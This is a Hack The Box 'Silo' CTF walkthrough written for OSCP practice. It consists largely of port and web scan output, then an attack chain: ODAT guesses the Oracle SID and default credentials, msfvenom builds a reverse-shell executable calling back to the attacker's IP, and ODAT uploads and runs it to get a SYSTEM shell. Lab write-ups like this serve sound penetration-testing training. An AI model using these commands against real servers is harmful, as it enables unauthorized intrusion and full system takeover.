Hack The Box: Silo Write-up (#37)
13 min readNov 16, 2020
This is my 37th box out of 45 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.
Reconnaissance
I found a new way to perform recon using an automated Nmap script called nmapAutomator. Please feel free to check it out here.
./nmapAutomater 10.10.10.82 All- All: Runs all the scans consecutively (~20–30 minutes)
We get the back the following result:
Running all scans on 10.10.10.82
Host is likely running Windows
---------------------Starting Nmap Quick Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 02:55 +08
Nmap scan report for 10.10.10.82
Host is up (0.011s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1521/tcp open oracle
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
---------------------Starting Nmap Basic Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 02:55 +08
Nmap scan report for 10.10.10.82
Host is up (0.060s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-11T18:57:13
|_ start_date: 2020-09-11T18:54:54Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.61 seconds----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 02:57 +08
Warning: 10.10.10.82 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.82
Host is up (0.079s latency).
All 1000 scanned ports on 10.10.10.82 are closed (569) or open|filtered (431)
Nmap done: 1 IP address (1 host up) scanned in 708.49 seconds
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 03:09 +08
Initiating Parallel DNS resolution of 1 host. at 03:09
Completed Parallel DNS resolution of 1 host. at 03:09, 0.01s elapsed
Initiating SYN Stealth Scan at 03:09
Scanning 10.10.10.82 [65535 ports]
Discovered open port 139/tcp on 10.10.10.82
Discovered open port 80/tcp on 10.10.10.82
Discovered open port 445/tcp on 10.10.10.82
Discovered open port 135/tcp on 10.10.10.82
Warning: 10.10.10.82 giving up on port because retransmission cap hit (1).
Increasing send delay for 10.10.10.82 from 0 to 5 due to 204 out of 509 dropped probes since last increase.
Discovered open port 49155/tcp on 10.10.10.82
SYN Stealth Scan Timing: About 7.25% done; ETC: 03:16 (0:06:37 remaining)
SYN Stealth Scan Timing: About 14.64% done; ETC: 03:16 (0:06:13 remaining)
Discovered open port 49162/tcp on 10.10.10.82
Discovered open port 49153/tcp on 10.10.10.82
SYN Stealth Scan Timing: About 21.43% done; ETC: 03:16 (0:05:45 remaining)
Discovered open port 49154/tcp on 10.10.10.82
SYN Stealth Scan Timing: About 28.24% done; ETC: 03:16 (0:05:15 remaining)
SYN Stealth Scan Timing: About 34.93% done; ETC: 03:16 (0:04:47 remaining)
SYN Stealth Scan Timing: About 41.58% done; ETC: 03:16 (0:04:19 remaining)
SYN Stealth Scan Timing: About 48.28% done; ETC: 03:16 (0:03:49 remaining)
Discovered open port 49161/tcp on 10.10.10.82
SYN Stealth Scan Timing: About 54.98% done; ETC: 03:16 (0:03:20 remaining)
Discovered open port 49152/tcp on 10.10.10.82
Discovered open port 5985/tcp on 10.10.10.82
SYN Stealth Scan Timing: About 61.73% done; ETC: 03:16 (0:02:50 remaining)
SYN Stealth Scan Timing: About 68.52% done; ETC: 03:16 (0:02:20 remaining)
Discovered open port 49160/tcp on 10.10.10.82
SYN Stealth Scan Timing: About 75.24% done; ETC: 03:16 (0:01:50 remaining)
SYN Stealth Scan Timing: About 81.84% done; ETC: 03:16 (0:01:21 remaining)
SYN Stealth Scan Timing: About 86.69% done; ETC: 03:53 (0:05:51 remaining)
Discovered open port 47001/tcp on 10.10.10.82
SYN Stealth Scan Timing: About 92.57% done; ETC: 03:50 (0:03:06 remaining)
Discovered open port 1521/tcp on 10.10.10.82
Discovered open port 49159/tcp on 10.10.10.82
Completed SYN Stealth Scan at 03:48, 2387.10s elapsed (65535 total ports)
Nmap scan report for 10.10.10.82
Host is up (0.014s latency).
Not shown: 65427 closed ports, 93 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1521/tcp open oracle
5985/tcp open wsman
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2387.20 seconds
Raw packets sent: 79865 (3.514MB) | Rcvd: 79253 (3.170MB)
Making a script scan on extra ports: 5985, 47001, 49161, 49162
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 03:48 +08
Nmap scan report for 10.10.10.82
Host is up (0.0075s latency).
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.25 seconds---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on all ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 03:49 +08
Nmap scan report for 10.10.10.82
Host is up (0.011s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS Listener (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open unknown
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.18 secondsRunning Vuln scan on all ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 03:52 +08
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.82
Host is up (0.058s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/8.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49152/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49160/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49161/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49162/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results:
|_samba-vuln-cve-2012-1182: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: No accounts left to tryService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 679.25 seconds---------------------Recon Recommendations----------------------Web Servers Recon:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.asp,.aspx,.php -u http://10.10.10.82:80 -o recon/gobuster_10.10.10.82_80.txt
nikto -host 10.10.10.82:80 | tee recon/nikto_10.10.10.82_80.txt
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.82:5985 -o recon/gobuster_10.10.10.82_5985.txt
nikto -host 10.10.10.82:5985 | tee recon/nikto_10.10.10.82_5985.txt
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.82:47001 -o recon/gobuster_10.10.10.82_47001.txt
nikto -host 10.10.10.82:47001 | tee recon/nikto_10.10.10.82_47001.txt
SMB Recon:
smbmap -H 10.10.10.82 | tee recon/smbmap_10.10.10.82.txt
smbclient -L "//10.10.10.82/" -U "guest"% | tee recon/smbclient_10.10.10.82.txt
nmap -Pn -p445 --script vuln -oN recon/SMB_vulns_10.10.10.82.txt 10.10.10.82
Oracle Recon "Exc. from Default":
cd /opt/odat/;#10.10.10.82;
./odat.py sidguesser -s 10.10.10.82 -p 1521
./odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts/accounts-multiple.txt
cd -;#10.10.10.82;
Which commands would you like to run?
All (Default), gobuster, nikto, nmap, odat, smbclient, smbmap, Skip <!>
Running Default in (1) s:
---------------------Running Recon Commands----------------------
Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.82:80
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,asp,aspx,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/12 04:03:56 Starting gobuster
===============================================================
http://10.10.10.82:80/aspnet_client (Status: 301) [Size: 159]
===============================================================
2020/09/12 04:04:35 Finished
===============================================================
Finished gobuster scan
=========================
Starting nikto scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.82
+ Target Hostname: 10.10.10.82
+ Target Port: 80
+ Start Time: 2020-09-12 04:04:35 (GMT8)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/8.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 4.0.30319
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-09-12 04:07:37 (GMT8) (182 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan
=========================
Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.82:5985
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/12 04:07:37 Starting gobuster
===============================================================
===============================================================
2020/09/12 04:07:46 Finished
===============================================================
Finished gobuster scan
=========================
Starting nikto scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.82
+ Target Hostname: 10.10.10.82
+ Target Port: 5985
+ Start Time: 2020-09-12 04:07:47 (GMT8)
---------------------------------------------------------------------------
+ Server: Microsoft-HTTPAPI/2.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7864 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2020-09-12 04:10:08 (GMT8) (141 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan
=========================
Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.82:47001
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: php,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/12 04:10:08 Starting gobuster
===============================================================
===============================================================
2020/09/12 04:10:18 Finished
===============================================================
Finished gobuster scan
=========================
Starting nikto scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.82
+ Target Hostname: 10.10.10.82
+ Target Port: 47001
+ Start Time: 2020-09-12 04:10:19 (GMT8)
---------------------------------------------------------------------------
+ Server: Microsoft-HTTPAPI/2.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7864 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2020-09-12 04:12:40 (GMT8) (141 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan
=========================
Starting smbmap scan
[!] Authentication error on 10.10.10.82
Finished smbmap scan
=========================
Starting smbclient scan
session setup failed: NT_STATUS_ACCOUNT_DISABLED
Finished smbclient scan
=========================
Starting nmap scan
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 04:12 +08
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.82
Host is up (0.0076s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Host script results:
|_samba-vuln-cve-2012-1182: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: No accounts left to try
Nmap done: 1 IP address (1 host up) scanned in 48.35 seconds
Finished nmap scan
=========================
Starting odat scan
/htb/Silo
Finished odat scan
=========================
---------------------Finished all Nmap scans---------------------Completed in 1 hour(s), 18 minute(s) and 30 second(s)
- Port 80: — Running HTTP service, Microsoft IIS httpd 8.5.
- Port 135, 49152, 49153,49154, 49155 ,49160,49161 and 49162: — Running msrpc service.
- Port 139 and 445: — Running Samba service.
- Port 1521 and 49159: — Running oracle-tns, Oracle TNS listener 11.2.0.2.0.
- Port 5985 and 47001: — Running HTTP service, Microsoft HTTP API httpd 2.0.
We have a total of 15 open ports. Before we begin enumeration, let’s do a quick mental note.
- Port 80 running Microsoft IIS 8.5. This version associated with Windows Server 2012 R2. You can check here. Gobuster and Nikto scan didn't find anything useful on the web server.
- Samba service access is not allowed as we can the error message states “NT_STATUS_ACCOUNT_DISABLED”
- Port 1521 and 49159 are running Oracle TNS listener. The is the server process that provides basic network connectivity for clients, application servers, and other databases to an Oracle database. nmapAutomator results show it tried ODAT (Oracle Database Attacking Tool) to recon this service but it failed since I don't have this tool in my Kali Linux. We will do manual enumeration for this service. Based on the ODAT usage description, If we’re able to get valid SID (a unique name that uniquely identifies your instance/database) and credentials we were able to perform code execution.
Service Enumeration
Install ODAT by following the instruction here. Then run the following command from the ODAT installation directory to find valid SID.
python3 odat.py sidguesser --sids-file /usr/share/odat/sids.txt -s 10.10.10.82 -p 1521
We have 2 valid SIDs. We’ll use XE.
Next ODAT has passwordguesser module to guess database credentials using the discovered SID and default password lists (that come with ODAT installation). So run the following command.
python3 odat.py passwordguesser -d XE -s 10.10.10.82 -p 1521We get back the following results.
ODAT has found valid credentials. According to Oracle documentation, these credentials are Oracles’ default credentials. Now we have a valid SID and credentials we can move to the next phase to get access to the target.
Exploitation
ODAT has file upload feature called utlfile. We’ll use this to upload a reverse shell payload to the target. Then call the payload using another module externaltable. Let’s begin.
Generate a reverse shell payload using MSFVenom.
msfvenom -p windows/shell_reverse_tcp -f exe lhost=10.10.14.31 lport=53 -o shell.exeUpload the payload to the target’s /temp directory.
python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE -n -t --sysdba --putFile \temp shell.exe /htb/Silo/shell.exePayload successfully uploaded.
Set up a Netcat listener on your Kali Linux.
nc -nlvp 53Next, execute the following command to execute the payload.
python3 odat.py externaltable -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE -n -t --sysdba --exec /temp shell.exeCheck back the listener.
We get a SYSTEM shell!. The database must have been running with SYSTEM privilege and that is the reason we get SYSTEM.
Grab the user flag.
Grab the root flag.
Attack Strategy Map
I have summarized the entire attack strategy on this map.
Thank you for reading :-) Next box is Bounty.
